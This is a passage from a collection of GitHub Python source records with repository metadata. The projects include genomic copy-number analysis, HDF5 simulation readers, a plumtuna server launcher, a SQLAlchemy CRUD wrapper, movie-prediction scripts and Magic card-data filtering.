contig in range(len(total_cn)):\n if total_cn[contig] >= amp_threshold: \n amps.append(id_list[contig]) \n #take the list of amps obtained in for loop above and convert to a table\n if len(amps) >0:\n amps_df = pd.DataFrame(amps)\n amps_df[[ 'chr', 'start', 'end','total_cn', 'sample']] = amps_df[0].str.split('_', 4, expand=True)\n amps_df.drop(columns=[0])\n else:\n amps_df = pd.DataFrame(columns=[0])\n ##for each contig (no matter if it is amplified) report whether any contig overlaps with gene of interest - this is to identify samples with no data for the gene of interest for i in range(len(gene_df.index)): ##need file with all coding gene name chromosome coordinates #for gene in gene_df:\n genes_in_amps = [[] for _ in range(len(amps_df.index))]\n for i in range(len(gene_df.index)): \n gene = SequenceRange(gene_df['gene_name'][i], gene_df['transcript_ID'][i], gene_df['start'][i], gene_df['end'][i], gene_df['chr'][i], 'total_cn_placeholder')\n ##find the genes with missing data\n contig_overlapping_gene = list()\n cnv_chr = cnv.loc[cnv['seqnames'].astype('str') == gene.chrom]\n cnv_chr.index = pd.RangeIndex(len(cnv_chr.index))\n contigs_after_gene = list()\n contigs_before_gene = list()\n for contig in range(len(list(cnv_chr['total_cn']))):\n contig_range= SequenceRange('place_holder', 'place_holder', int(cnv_chr['start'][contig]), int(cnv_chr['end'][contig]), str(cnv_chr['seqnames'][contig]), cnv_chr['total_cn'][contig])\n if contig_range.overlaps(gene):\n contig_overlapping_gene.append(id_list[contig])\n else:\n if contig_range.start > gene.end:\n distance_from_gene = gene.end - contig_range.start\n contig_id = contig_range.chrom + '_' +str(contig_range.start) + '_' +str(contig_range.end) + '_' + str(contig_range.total_cn) + '_' + str(distance_from_gene) + '_' +sample\n contigs_after_gene.append(contig_id)\n elif contig_range.end < gene.start:\n distance_from_gene = gene.start - contig_range.end\n contig_id = contig_range.chrom + '_' +str(contig_range.start) + '_' +str(contig_range.end) + '_' + str(contig_range.total_cn)+ '_'+ str(distance_from_gene) +'_' +sample\n contigs_before_gene.append(contig_id)\n if len(contig_overlapping_gene)== 0:\n missing_gene_data_sample.append(gene.name + '_' + gene.transcript + '_' +str(gene.start) + '_' +str(gene.end) +'_' +gene.chrom + '_' + sample)\n \n ##if there are contigs after the missing gene. 
Find the closest one and see if it is amplified\n total_cn_of_amp_neighbours = []\n if len(contigs_after_gene) >0:\n contigs_after_gene_df = pd.DataFrame(contigs_after_gene)\n contigs_after_gene_df[[ 'chr', 'start', 'end','total_cn', 'distance_from_gene', 'sample']] = contigs_after_gene_df[0].str.split('_', 5, expand=True)\n contigs_after_gene_df['total_cn'] = contigs_after_gene_df['total_cn'].astype('int') \n contigs_after_gene_df['distance_from_gene'] = contigs_after_gene_df['distance_from_gene'].astype('int') \n\n if contigs_after_gene_df['total_cn'][contigs_after_gene_df['distance_from_gene'].idxmax()] > amp_threshold:\n total_cn_of_amp_neighbours.append(contigs_after_gene_df['total_cn'][contigs_after_gene_df['distance_from_gene'].idxmax()])\n \n if len(contigs_before_gene) >0: \n contigs_before_gene_df = pd.DataFrame(contigs_before_gene)\n contigs_before_gene_df[[ 'chr', 'start', 'end','total_cn', 'distance_from_gene', 'sample']] = contigs_before_gene_df[0].str.split('_', 5, expand=True)\n contigs_before_gene_df['total_cn'] = contigs_before_gene_df['total_cn'].astype('int') \n contigs_before_gene_df['distance_from_gene'] = contigs_before_gene_df['distance_from_gene'].astype('int') \n\n if contigs_before_gene_df['total_cn'][contigs_before_gene_df['distance_from_gene'].idxmin()] > amp_threshold:\n total_cn_of_amp_neighbours.append(contigs_before_gene_df['total_cn'][contigs_before_gene_df['distance_from_gene'].idxmin()])\n\n if len(total_cn_of_amp_neighbours) > 0:\n missing_data_genes_next_to_amps.append(gene.name + '_' + gene.transcript + '_' +str(gene.start) + '_' +str(gene.end) +'_' +gene.chrom + '_' +str(total_cn_of_amp_neighbours) + '_' +sample)\n\n ##report the genes in each amp\n if len(amps) > 0: \n for amp in range(len(amps_df.index)):\n amp_range= SequenceRange('place_holder', 'place_holder', int(amps_df['start'][amp]), int(amps_df['end'][amp]), str(amps_df['chr'][amp]), amps_df['total_cn'][amp])\n if amp_range.overlaps(gene) and amp_range.chrom == gene.chrom:\n genes_in_amps[amp].append(gene.name +'_' + gene.transcript + '_' +str(gene.start) + '_' +str(gene.end) + '_' +gene.chrom + '_' + sample)\n #genes_in_amps[amp].append(gene.name)\n amps_df['genes_in_amps'] = genes_in_amps\n \n #print(sample)\n with open(sample + '_mtr_format_cnv_missing.txt', 'w') as f:\n f.write(sample+' complete')\nexcept FileNotFoundError as e:\n with open(sample + '_mtr_format_cnv_missing.txt', 'w') as f:\n f.write(sample+' no mtr format cnv file')\n \nif len(missing_gene_data_sample) >0:\n missing_data_samples_gene_df = pd.DataFrame(missing_gene_data_sample)\n #missing_data_samples_gene_df = missing_data_samples_mdm2_df.rename(columns={0: 'missing_mdm2_samples'})\n missing_data_samples_gene_df[['gene', 'transcript_ID', 'start', 'end','chr', 'sample']] = missing_data_samples_gene_df[0].str.split('_', 5, expand=True)\n missing_data_samples_gene_df.drop(columns=[0])\nelse:\n missing_data_samples_gene_df = pd.DataFrame(columns=[0])\n \nif len(missing_data_genes_next_to_amps) >0:\n missing_data_genes_next_to_amps_df = pd.DataFrame(missing_data_genes_next_to_amps)\n #missing_data_samples_gene_df = missing_data_samples_mdm2_df.rename(columns={0: 'missing_mdm2_samples'})\n #missing_data_genes_next_to_amps_df[['gene', 'transcript_ID', 'start', 'end','chr', 'sample']] = missing_data_genes_next_to_amps_df[0].str.split('_', 5, expand=True)\n missing_data_genes_next_to_amps_df[['gene', 'transcript_ID', 'start', 'end','chr', 'total_cn_contig_after_contig_before', 'sample']] = 
missing_data_genes_next_to_amps_df[0].str.split('_', 6, expand=True)\n missing_data_genes_next_to_amps_df.drop(columns=[0])\nelse:\n missing_data_genes_next_to_amps_df = pd.DataFrame(columns=[0])\n\n#output table of genes with missing data \nmissing_data_samples_gene_df.to_csv(sample + '_genes_with_missing_data.csv')\n\n#output table of genes with missing data next to amps \nmissing_data_genes_next_to_amps_df.to_csv(sample + '_genes_with_missing_data_next_to_amps.csv')\n\n#output amps_df\namps_df.to_csv(sample + '_amplifications.csv')\n","repo_name":"Daniella-Black/cnv_drivers","sub_path":"bin/cnv_drivers.py","file_name":"cnv_drivers.py","file_ext":"py","file_size_in_byte":9344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6893558577","text":"import numpy as np\nimport h5py \n\ndef read(filename):\n\tfile = h5py.File(filename,'r')\n\thdf5_menu=list(file.keys())\n\tparticle_keys=list(file['PartType0'])\n\tif 'PartType5' in hdf5_menu:\n\t\tsink_keys=list(file['PartType5'])\n\n\tclass a():\n\t\tpass\n\theader=np.array(list(file.get(\"Header\").attrs.values()))\n\ta.boxsize=header[6]\n\tnpart=header[0]\n\ta.npart=npart\n\ta.nparttot=header[1]\n\ta.time=header[4]\n\tprint('boxsize: '+str(a.boxsize))\n\tprint('Npart: '+str(a.npart))\n\tprint('Npart_tot: '+str(a.nparttot))\n\tprint('time in code units: '+str(a.time))\n\n\tN = int(sum(npart)) - npart[4] # type 4 is reserved for TRACER_MC\n\tngas = npart[0]\n\tnsink = npart[5]\n\t\n\ta.nsink=nsink\n\ta.ngas=ngas\n\ta.unit_leng_cm = 1.0e+17\n\ta.unit_mass_g = 1.991e33\n\ta.unit_time_s = 2.7436898e12\n\n\tigot_pot = 0\n\tigot_accel = 0\n\tigot_dt = 0\n\tigot_bmag = 0\n\tigot_chem = 0\n\tigot_soft = 0\n\n\tfor key in particle_keys:\n\t\tdata=np.array(file['PartType0'][key])\n\t\tif key=='Coordinates':\n\t\t\tprint('Reading Coordinates')\n\t\t\ta.x,a.y,a.z=data[:,0],data[:,1],data[:,2]\n\t\tif key=='Velocities':\n\t\t\tprint('Reading Velocities')\n\t\t\ta.vx,a.vy,a.vz=data[:,0],data[:,1],data[:,2]\n\t\tif key=='Acceleration':\n\t\t\tprint('Reading Acceleration')\n\t\t\ta.accelx,a.accely,a.accelz=data[:,0],data[:,1],data[:,2]\n\t\t\tigot_accel = 1\n\t\tif key=='ChemicalAbundances':\n\t\t\tprint('Reading ChemicalAbundances')\n\t\t\ta.chem=data\t\t\t\n\t\tif key=='DednerSpeed':\n\t\t\tprint('Reading DednerSpeed')\n\t\t\ta.dedner=data\n\t\tif key=='Density':\n\t\t\tprint('Reading Density')\n\t\t\ta.rho=data\n\t\tif key=='Gamma':\n\t\t\tprint('Reading Gamma')\n\t\t\ta.gamma=data\n\t\tif key=='InternalEnergy':\n\t\t\tprint('Reading InternalEnergy')\n\t\t\ta.u=data\n\t\tif key=='MagneticField':\n\t\t\tprint('Reading MagneticField')\n\t\t\ta.bx,a.by,a.bz=data[:,0],data[:,1],data[:,2]\n\t\tif key=='MagneticFieldDivergence':\n\t\t\tprint('Reading MagneticFieldDivergence')\n\t\t\ta.divb=data\n\t\tif key=='MagneticFieldDivergenceAlternative':\n\t\t\tprint('Reading MagneticFieldDivergenceAlternative')\n\t\t\ta.divb_alt=data\n\t\tif key=='MagneticFieldPsi':\n\t\t\tprint('Reading MagneticFieldPsi')\n\t\t\tprint('MagneticFieldPsi shape '+str(data.shape))\n\t\t\ta.bpsi=data\n\t\tif key=='Masses':\n\t\t\tprint('Reading Masses')\n\t\t\ta.mass=data\n\t\tif key=='ParticleIDs':\n\t\t\tprint('Reading ParticleIDs')\n\t\t\ta.partid=data\n\t\tif key=='Potential':\n\t\t\tprint('Reading Potential')\n\t\t\ta.potential=data\n\t\t\tigot_pot = 1\n\t\tif key=='PotentialPeak':\n\t\t\tprint('Reading PotentialPeak')\n\t\t\ta.peak=data\n\t\tif key=='VelocityDivergence':\n\t\t\tprint('Reading 
VelocityDivergence')\n\t\t\ta.divv=data\n\tif (a.nsink > 0):\n\t\tprint(\"Sinks read. Making sink arrays.\")\n\t\ta.idsink = np.linspace(0,nsink-1,nsink,dtype='int32') + ngas\n\t\ta.sinkx = a.x[a.idsink]\n\t\ta.sinky = a.y[a.idsink]\n\t\ta.sinkz = a.z[a.idsink]\n\t\ta.sinkvx = a.vx[a.idsink]\n\t\ta.sinkvy = a.vy[a.idsink]\n\t\ta.sinkvz = a.vz[a.idsink]\n\t\ta.sinkmass = a.mass[a.idsink]\n\t\ta.sinkid = a.partid[a.idsink]\n\n\ti_not_gas = [1, 2, 3, 5] # type 4 is reserved for TRACER_MC\n\tif(sum(npart[i_not_gas]) > 0):\n\t\tigas = np.linspace(0,ngas-1,ngas,dtype='int32')\n\t\ta.x = a.x[igas]\n\t\ta.y = a.y[igas]\n\t\ta.z = a.z[igas]\n\t\ta.vx = a.vx[igas]\n\t\ta.vy = a.vy[igas]\n\t\ta.vz = a.vz[igas]\n\t\ta.partid = a.partid[igas]\n\t\ta.mass = a.mass[igas]\n\t\tif (igot_pot == 1):\n\t\t\ta.potential = a.potential[igas]\n\t\tif (igot_accel == 1):\n\t\t\t# acceleration was read into per-component 1-D arrays above, so slice each component\n\t\t\ta.accelx = a.accelx[igas]\n\t\t\ta.accely = a.accely[igas]\n\t\t\ta.accelz = a.accelz[igas]\n\t\tif (igot_dt == 1):\n\t\t\ta.dt = a.dt[igas]\n\t\tif (igot_soft == 1):\n\t\t\ta.softening = a.softening[igas]\n\n\t# if we have chemistry, then we need to provide the temperature\n\tif (igot_chem > 0):\n\t\tprint('Creating an array with T [K] from specific energies')\n\t\tABHE = 0.1\n\t\tuenergy = 2.64481e+42\n\t\tulength = 1e17\n\t\tudensity = 1.991e-18\n\t\tmp = 1.6726e-24   # proton mass in g (cgs); was undefined in the original\n\t\tk_B = 1.3807e-16  # Boltzmann constant in erg/K (cgs); was undefined in the original\n\t\tyn = a.rho*udensity / ((1.0 + 4.0 * ABHE) * mp)\n\t\tenergy = a.u * a.rho * uenergy / ulength**3\n\t\tyntot = (1.0 + ABHE - a.chem[:, 0] + a.chem[:, 1]) * yn\n\t\ta.temp = 2.0 * energy / (3.0 * yntot * k_B)\n\n\t# get radius from densest point, com, or first sink\n\tif (a.nsink > 0):\n\t\ta.rad = np.sqrt((a.x - a.sinkx[0])**2 + (a.y - a.sinky[0])**2 + (a.z - a.sinkz[0])**2)\n\n\n\tif(igot_bmag > 0):\n\t\ta.l = (a.mass / a.rho)**(1./3.)\n\t\ta.bmag = np.sqrt(a.bx**2 + a.by**2 + a.bz**2)  # bx/by/bz are 1-D components; the original indexed them as 2-D\n\n\treturn a\n","repo_name":"lewisprole/Pop3_Bfield","sub_path":"lewis_arepo_code/hdf5_read.py","file_name":"hdf5_read.py","file_ext":"py","file_size_in_byte":4056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24455527452","text":"from contextlib import closing\nimport socket\nimport subprocess\n\nDEFAULT_PORT=7364\n\nclass PlumtunaServer(object):\n    def __init__(self, bind_addr=None, bind_port=None, contact_host=None, contact_port=None):\n        http_port = find_free_port()\n        if contact_host is None:\n            rpc_addr, rpc_port = find_rpc_server_addr_and_port(bind_addr, bind_port)\n        else:\n            contact_port = contact_port or DEFAULT_PORT\n            rpc_addr, rpc_port = find_rpc_client_addr_and_port(bind_addr, bind_port, contact_host, contact_port)\n\n        args = [\"plumtuna\",\n                \"--http-port\", str(http_port),\n                \"--rpc-addr\", \"{}:{}\".format(rpc_addr, rpc_port),\n                \"--exit-if-stdin-close\"]\n        if contact_host is not None:\n            args.extend([\"--contact-server\", \"{}:{}\".format(contact_host, contact_port)])\n\n        self._process = subprocess.Popen(args, stdin=subprocess.PIPE)\n        assert self._process is not None\n\n        self.http_port = http_port\n        self.rpc_addr = rpc_addr\n        self.rpc_port = rpc_port\n\n    def __del__(self):\n        if self._process is not None:\n            try:\n                self._process.kill()\n            except AttributeError:\n                pass\n\n\ndef find_rpc_client_addr_and_port(addr=None, port=None, contact_host=None, contact_port=None):\n    if addr is None or port is None:\n        client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        client.connect((contact_host, contact_port))\n        local_addr, local_port = client.getsockname()\n        if addr is None:\n            addr = local_addr\n        if port is None:\n            port = local_port\n    return (addr, port)\n\ndef 
find_rpc_server_addr_and_port(addr=None, port=None):\n    port = port or find_free_port()\n    if addr is None:\n        addr = socket.gethostbyname(socket.gethostname())\n    else:\n        addr = socket.gethostbyname(addr)\n    return (addr, port)\n\ndef find_free_port():\n    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:\n        s.bind(('', 0))\n        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n        return s.getsockname()[1]\n\ndef find_local_addr(peer_host, peer_port):\n    # original signature took a single `peer` but referenced undefined peer_host/peer_port and returned nothing\n    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    client.connect((peer_host, peer_port))\n    return client.getsockname()[0]\n","repo_name":"sile/plumtuna.py","sub_path":"plumtuna/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"16968541827","text":"\ndef solution(s):\n    \n    result = []\n    zero = num = cnt = 0\n    while len(s) != 1:\n\n        zero = s.count('0')\n        s = s.replace('0', '')\n        s = format(len(s), 'b')\n\n        cnt += zero\n        num += 1\n\n    result.append(num)\n    result.append(cnt)\n\n    return result\n    ","repo_name":"wdahlia/Python-Algorithm","sub_path":"프로그래머스/PG_이진변환반복.py","file_name":"PG_이진변환반복.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"1328023891","text":"#!/usr/local/bin/python3\n\nimport h5py\nimport argparse\nimport numpy as np\nimport sys\n\ndef main():\n    parser = argparse.ArgumentParser(description=\"dump hdf5 to txt\", usage=\"h5parse [-h] file datasets[:col,col,col] [datasets ...] [-o OUTPUT]\")\n    parser.add_argument('file', type=str, help=\"hdf5 archive\")\n    parser.add_argument('datasets', type=str, nargs=\"+\", help=\"datasets from hdf5 to dump to txt\")\n    parser.add_argument('-o', \"--output\", type=str, help=\"output file\")\n    args = parser.parse_args()\n\n    try:\n        f = h5py.File(args.file, \"r\")\n    except OSError:\n        print(\"error: file %s does not exist\" % args.file)\n        return 1\n\n    n = len(args.datasets)\n    data = [0]*n\n\n    for i in range(n):\n        arg_in = args.datasets[i].split(\":\")\n        datapath = arg_in[0]\n        try:\n            load_data = f[datapath][()]  # h5py 3.x removed the deprecated .value attribute\n        except KeyError:\n            print(\"error: dataset %s does not exist\" % datapath)\n            return 1\n\n        if len(arg_in) == 1:\n            data[i] = load_data\n        elif len(arg_in) == 2:\n            cols = [int(i) for i in arg_in[1].split(\",\")]\n            if all(c < load_data.shape[1] for c in cols):\n                data[i] = load_data[:, cols]\n            else:\n                print(\"error: column out of bounds in dataset %s\" % datapath)\n                return 1\n    \n\n    nrows = data[0].shape[0]\n    ncols = 0\n    for i in range(n):\n        if len(data[i].shape) > 1:\n            ncols += data[i].shape[1]\n        else:\n            ncols += 1\n\n        if data[i].shape[0] != nrows:\n            print(\"error: datasets have incompatible shapes\")\n            return 1\n\n    out = np.zeros((nrows, ncols))\n    col = 0\n    for i in range(n):\n        if len(data[i].shape) > 1:\n            for j in range(data[i].shape[1]):\n                out[:, col] = data[i][:,j]\n                col += 1\n        else:\n            out[:, col] = data[i]\n            col += 1\n\n\n    if (args.output):\n        np.savetxt(args.output, out)\n    else:\n        np.savetxt(sys.stdout.buffer, out)\n\n    return 0\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"CQMP/scripts","sub_path":"h5parse/h5parse.py","file_name":"h5parse.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2222801110","text":"import ast\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport sys\n\nfrom test_functions import *\nfrom preprocessing import 
*\nfrom utils import *\nfrom naive_bayes import *\nfrom svm_classifier import *\nfrom decision_regression_trees import *\nfrom instance_based import *\nfrom features_improement import *\n\ndef test_algorithms(movies_metadata_dataframe, credits_dataframe):\n \"\"\" Tests several (decision tree) algorithms usign some dataframes \"\"\"\n # Creates testing dataframe\n df = create_trees_testing_dataframe(movies_metadata_dataframe, credits_dataframe)\n\n # Tests decision tree or gradient boosting classification\n print(\"Predicting the success of the movies using classification ...\")\n X = df.drop(columns=\"is_successful\")\n y = df[\"is_successful\"]\n\n test_decision_tree_classification_with_cv(X, y)\n test_gradient_boosting_classification_with_cv(X, y)\n test_knn_classification_with_cv(X, y)\n\n X_train, X_test, y_train, y_test = train_test_split(X, y,\n test_size=0.33,\n random_state=42)\n\n test_gradient_boosting_classification(X_train, X_test, y_train, y_test)\n test_decision_tree_classification(X_train, X_test, y_train, y_test)\n\n # Tests regression tree, liear regression and boosting\n print(\"\\nPredicting revenue using regression ...\")\n print(\" The shape of the dataframe before filtering is: \", df.shape)\n df[\"revenue\"] = movies_metadata_dataframe[\"revenue\"]\n print(\" The revenue values equal to 0 are: \", df[df[\"revenue\"] == 0.0][\"revenue\"].count())\n print(\" Replacing the revenue's 0 values with NaN ...\")\n df[\"revenue\"].replace(0.0, np.nan, inplace=True)\n print(\" The revenue values that are NaN are: \", df[df['revenue'].isnull()].shape)\n print(\" Filtering the datafram by the revenue values that are not NaN ...\")\n df = df[df['revenue'].notnull()]\n print(\" The shape of the dataframe after filtering is: \", df.shape)\n show_columns_with_nan(df)\n #X_train, X_test, y_train, y_test = train_test_split(df.drop(columns=\"revenue\"),\n # df[\"revenue\"],\n # test_size=0.33,\n # random_state=42)\n X = df.drop(columns=\"revenue\")\n y = df[\"revenue\"]\n test_linear_regression_with_cv(X, y)\n test_decision_tree_regression_with_cv(X, y)\n test_gradient_boosting_regression_with_cv(X, y)\n test_knn_regression_with_cv(X, y)\n\n\ndef main():\n movies_metadata_test_file_path = \"movies_metadata_test.csv\"\n movies_metadata_file_path = \"files/the-movies-dataset/movies_metadata.csv\"\n credits_file_path = \"files/the-movies-dataset/credits.csv\"\n ratings_file_path = \"files/the-movies-dataset/ratings_small.csv\"\n imdb_movies_file_path = \"files/imdb/imdb.csv\"\n\n print(\"Reading movies data ...\")\n\n # Reads the movies metadata data\n print(\" Reading the movies' metadata ...\")\n movies_metadata_dataframe = read_data(movies_metadata_file_path)\n\n # Reads the ratings data\n print(\" Reading the movies' ratings ...\")\n ratings_dataframe = read_data(ratings_file_path)\n\n # Reads the credits data\n print(\" Reading the movies' credits ...\")\n credits_dataframe = read_data(credits_file_path)\n\n # Reads the imdb movies data\n #print(\" Reading the imdb movies data ...\")\n #imdb_movies_dataframe = read_data(imdb_movies_file_path)\n\n # Adds the the imdb movies data to the imds_movies_dataframe\n #movies_metadata_dataframe = add_new_columns_from_imdb_movies_dataframe(imdb_movies_dataframe,\n # movies_metadata_dataframe)\n\n # Preprocesses the movies' metadata\n movies_metadata_dataframe = preprocess_movies_metadata(movies_metadata_dataframe, False)\n\n # Preprocesses the movies' credits\n credits_dataframe = preprocess_movies_credits(credits_dataframe)\n\n # Tests 
algorithms with some data\n test_algorithms(movies_metadata_dataframe, credits_dataframe)\n naive_bayes(movies_metadata_dataframe, credits_dataframe)\n test_svm(movies_metadata_dataframe, credits_dataframe)\n\n\nif __name__ == \"__main__\":\n # Enables the unicode console encoding on Windows\n if sys.platform == \"win32\":\n enable_win_unicode_console()\n main()\n","repo_name":"hristy93/Attis","sub_path":"MoviesApp.py","file_name":"MoviesApp.py","file_ext":"py","file_size_in_byte":4440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39792398366","text":"__title__ = 'readtime'\n__description__ = 'Calculates the time some text takes the average human to ' \\\n 'read, based on Medium\\'s read time formula'\n__url__ = 'https://github.com/alanhamlett/readtime'\n__version_info__ = ('3', '0', '0')\n__version__ = '.'.join(__version_info__)\n__author__ = 'Alan Hamlett'\n__author_email__ = 'alan.hamlett@gmail.com'\n__license__ = 'BSD'\n__copyright__ = 'Copyright 2016 Alan Hamlett'\n","repo_name":"alanhamlett/readtime","sub_path":"readtime/__about__.py","file_name":"__about__.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"21"} +{"seq_id":"29411712578","text":"from django.contrib import admin\nfrom untitled4 import settings\n# Register your models here.\nbase_dir = settings.BASE_DIR\norigin_path = base_dir + '/media'\nbase_path = base_dir+ '/advertisement/resources'\ntemp_path = base_path + '/temp_path'\njpg_path = temp_path + '/jpg_path'\ntext_path = temp_path + '/text_path'\ndarkflow_path = base_path + '/darkflow'\nmodel_path = base_path + '/darkflow/cfg/tiny-yolo-1c.cfg'","repo_name":"Subham2111/brand-exposure","sub_path":"advertisement/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19600182451","text":"from sqlalchemy import Column, and_, create_engine\nfrom sqlalchemy.orm import declarative_base, sessionmaker\n\n\nclass SqlOperator:\n def __init__(self, db_type, connection_string: str):\n self.engine = create_engine(connection_string)\n self.Session = sessionmaker(bind=self.engine)\n self.Base = declarative_base()\n\n def create_table(self, table_name: str, columns: str, keycolumn: str):\n try:\n \"\"\"Create table dynamically\"\"\"\n columns_def = {}\n for col_name, col_type in columns.items():\n if col_name == keycolumn:\n columns_def[col_name] = Column(col_type, primary_key=True)\n else:\n columns_def[col_name] = Column(col_type)\n table = type(\n table_name, (self.Base,), {\"__tablename__\": table_name, **columns_def}\n )\n if not hasattr(self.Base, table_name):\n setattr(self.Base, table_name, table)\n table.__table__.create(bind=self.engine)\n except Exception:\n raise Exception(\"create exception\")\n\n \"\"\" Count \"\"\"\n\n def count(self, table_name: str, criteria: dict = None):\n try:\n session = self.Session()\n findresult = self.search_generate(session, table_name, criteria)\n return len(findresult)\n except Exception:\n raise Exception(\"count exception\")\n\n \"\"\" Find \"\"\"\n\n def find(self, table_name: str, criteria: dict):\n try:\n session = self.Session()\n findresult = self.search_generate(session, table_name, criteria)\n results = []\n for obj in findresult:\n row = {}\n for col in obj.__table__.columns:\n row[col.name] = getattr(obj, col.name)\n results.append(row)\n return 
results\n except Exception:\n raise Exception(\"find exception\")\n\n def search_generate(self, session: object, table_name: str, criteria: dict):\n try:\n table = getattr(self.Base, table_name)\n query = session.query(table)\n conditions = []\n # Multiple\n if \"$and\" in criteria.keys():\n and_conditions = []\n for cond in criteria[\"$and\"]:\n cond_conditions = self.generate_conditions(table, cond)\n if cond_conditions:\n and_conditions.append(and_(*cond_conditions))\n if and_conditions:\n query = query.filter(and_(*and_conditions))\n else:\n conditions = self.generate_conditions(table, criteria)\n if conditions:\n query = query.filter(*conditions)\n return query.all()\n except Exception:\n raise Exception(\"search genarate exception\")\n\n def generate_conditions(self, table, criteria):\n try:\n conditions = []\n for key, value in criteria.items():\n column = getattr(table, key)\n if not isinstance(value, dict):\n condition = column == value\n elif \"$ne\" in value.keys():\n condition = column != value[\"$ne\"]\n elif \"$gt\" in value.keys():\n condition = column > value[\"$gt\"]\n elif \"$lt\" in value.keys():\n condition = column < value[\"$lt\"]\n elif \"$gte\" in value.keys():\n condition = column >= value[\"$gte\"]\n elif \"$lte\" in value.keys():\n condition = column <= value[\"$lte\"]\n elif \"$regex\" in value.keys():\n likesentence = self.convert_regexp_to_like(value[\"$regex\"])\n condition = column.like(likesentence)\n else:\n condition = None\n if condition is not None:\n conditions.append(condition)\n return conditions\n except Exception:\n raise Exception(\"generate condition exception\")\n\n def convert_regexp_to_like(self, regexp_pattern):\n try:\n # Convert regular expression patterns to LIKE\n like_pattern = regexp_pattern.replace(\".\", \"\")\n if like_pattern.startswith(\"^\") and like_pattern.endswith(\"$\"):\n like_pattern = like_pattern.replace(\"^\", \"\")\n like_pattern = like_pattern.replace(\"$\", \"%\")\n like_pattern = like_pattern.replace(\"*\", \"%\")\n like_pattern = like_pattern.replace(\"%%\", \"%\")\n else:\n like_pattern = like_pattern.replace(\"^\", \"\") + \"%%%%\"\n return like_pattern\n except Exception:\n raise Exception(\"convert regexp exception\")\n\n \"\"\" Insert \"\"\"\n\n def insert(self, table_name: str, data: dict):\n try:\n session = self.Session()\n table = getattr(self.Base, table_name)\n obj = table(**data)\n session.add(obj)\n session.commit()\n except Exception:\n raise Exception(\"insert exception\")\n\n \"\"\" Update \"\"\"\n\n def update(self, table_name: str, criteria: dict, updates: dict):\n try:\n session = self.Session()\n findresults = self.search_generate(session, table_name, criteria)\n if findresults:\n for findresult in findresults:\n for key, value in updates[\"$set\"].items():\n setattr(findresult, key, value)\n session.commit()\n except Exception:\n raise Exception(\"update exception\")\n\n \"\"\" Delete \"\"\"\n\n def delete(self, table_name: str, criteria: dict):\n try:\n session = self.Session()\n findresults = self.search_generate(session, table_name, criteria)\n\n if findresults:\n for findresult in findresults:\n session.delete(findresult)\n session.commit()\n except Exception:\n raise Exception(\"delete exception\")\n\n\n\"\"\" Connection \"\"\"\n\"\"\"\n# sqlite\nfrom libs.databases.sqloperate import SQLiteDatabase\ndb = SQLiteDatabase('sqlite:///test.db')\ndb = SQLiteDatabase('sqlite:///:memory:')\n\n# MySQL\nfrom libs.databases.sqloperate import MySQLDatabase\ndb = 
MySQLDatabase('mysql+pymysql://user:password@hostname/dbname')\n\n# PostgreSQL\nfrom libs.databases.sqloperate import PostgreSQLDatabase\ndb = PostgreSQLDatabase('postgresql+psycopg2://user:password@hostname/dbname')\n\n\"\"\"\n\n\nclass MySQLDatabase(SqlOperator):\n def __init__(self, connection_string):\n super().__init__(\"mysql\", connection_string)\n\n\nclass PostgreSQLDatabase(SqlOperator):\n def __init__(self, connection_string):\n super().__init__(\"postgresql\", connection_string)\n\n\nclass SQLiteDatabase(SqlOperator):\n def __init__(self, connection_string):\n super().__init__(\"sqlite\", connection_string)\n","repo_name":"Otazoman/uhiimanbot","sub_path":"libs/databases/sqloperate.py","file_name":"sqloperate.py","file_ext":"py","file_size_in_byte":6992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70537830132","text":"import pandas as pd\nimport datetime as dt\nimport re\n\nscryData = pd.read_csv('2020_09_25_data/card_data.csv')\n\n\n#######\n# feature filtering\n#######\n\n# layouts to filter out\n### transform might be interesting!!!\nfilter_layout_lst = ['art_series', 'augment', 'double_faced_token', 'emblem',\n 'host', 'planar', 'scheme', 'token', 'vanguard']\nscryData = scryData[~scryData['layout'].isin(filter_layout_lst)]\n\n# filter corrupted \nfilter_names_lst = ['Shu General', 'Ancient Spider', 'Longbow Archer',\n 'Livonya Silone',\n 'Noxious Hydra Breath', 'Tel-Jilad Archers',\n 'Bayou Dragonfly', 'Zhang Fei, Fierce Warrior',\n 'Lu Bu, Master-at-Arms']\nscryData = scryData[~scryData['names'].isin(filter_names_lst)]\n\n# filter meld cards\nfilter_names_lst = ['Brisela, Voice of Nightmares',\n 'Chittering Host',\n 'Hanweir, the Writhing Township']\nscryData = scryData[~scryData['names'].isin(filter_names_lst)]\n\n# filter universally banned cards\nfilter_names_lst = ['Cleanse', 'Imprison', 'Jihad', 'Crusade',\n 'Invoke Prejudice', 'Pradesh Gypsies',\n 'Stone-Throwing Devils']\nscryData = scryData[~scryData['names'].isin(filter_names_lst)]\n\n# filter by sets\nfilter_set_lst = ['unh', 'ust', 'und', 'ugl', 'tfth', 'htr', 'htr17', 'htr18',\n 'ana', 'tbth', 'pcel', 'tdag', 'prm', 'hho']\nscryData = scryData[~scryData['set_name'].isin(filter_set_lst)]\n\nfilter_settype_lst = ['funny', 'token', 'archenemy', 